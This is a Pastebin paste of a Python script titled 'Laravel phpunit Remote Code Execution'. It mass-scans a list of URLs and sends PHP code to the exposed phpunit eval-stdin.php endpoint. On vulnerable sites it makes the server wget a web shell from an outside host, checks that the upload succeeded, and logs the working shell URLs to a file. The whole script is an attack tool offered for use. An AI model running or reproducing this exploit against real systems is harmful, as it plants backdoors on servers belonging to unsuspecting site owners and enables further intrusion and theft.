SHARE
TWEET

Laravel phpunit Remote Code Execution

Jemb0t_IR3eng Jun 19th, 2019 117 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import requests as r
  2. import sys
  3. import os
  4. from platform import system
  5.  
  6. if system() == 'Linux':
  7.     os.system('clear')
  8. if system() == 'Windows':
  9.     os.system('cls')
  10.  
  11. banner = '''
  12. -----------------------
  13. |   Laravel           |
  14. |     phpunit         |
  15. |Remote Code Execution|
  16. |                     |
  17. |  Coded By bL@cKID   |
  18. -----------------------
  19. '''
  20.  
  21. print banner
  22.  
  23. def rce(url):
  24.     try:
  25.         cekos = '<?php echo php_uname(); ?>'
  26.         upshell = '<?php system("wget http://toyotakenya.com/toyotaservice/js/uploader.txt -O uploader.php"); ?>'
  27.         url = url.strip()
  28.         print "[Exploiting] " + url
  29.         cek = r.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=cekos)
  30.         if 'Linux' in cek.text:
  31.             print "[Vuln] " + url
  32.             r.post(url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', data=upshell)
  33.             cekshell = r.get(url+'/vendor/phpunit/phpunit/src/Util/PHP/uploader.php')
  34.             if 'GIF89a' in cekshell.text:
  35.                 print "[Shell Uploaded] " + url
  36.                 open('shell_phpunit.txt', 'a').write(cek.text+'\n'+url+'/vendor/phpunit/phpunit/src/Util/PHP/uploader.php'+'\n')
  37.             else:
  38.                 print "[Shell not Uploaded]" + url
  39.         else:
  40.             print "[Not Vuln]" + url
  41.     except:
  42.         pass
  43.  
  44. def main():
  45.     list = open(sys.argv[1], 'r').readlines()
  46.     for x in list:
  47.         try:
  48.             x = x.strip()
  49.             rce(x)
  50.         except:
  51.             pass
  52. if __name__ == "__main__":
  53.     if len(sys.argv) < 2:
  54.         print "Usage : python " + sys.argv[0] + " list.txt"
  55.     else:
  56.         main()
  57. print "Done, saved to : shell_phpunit.txt"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top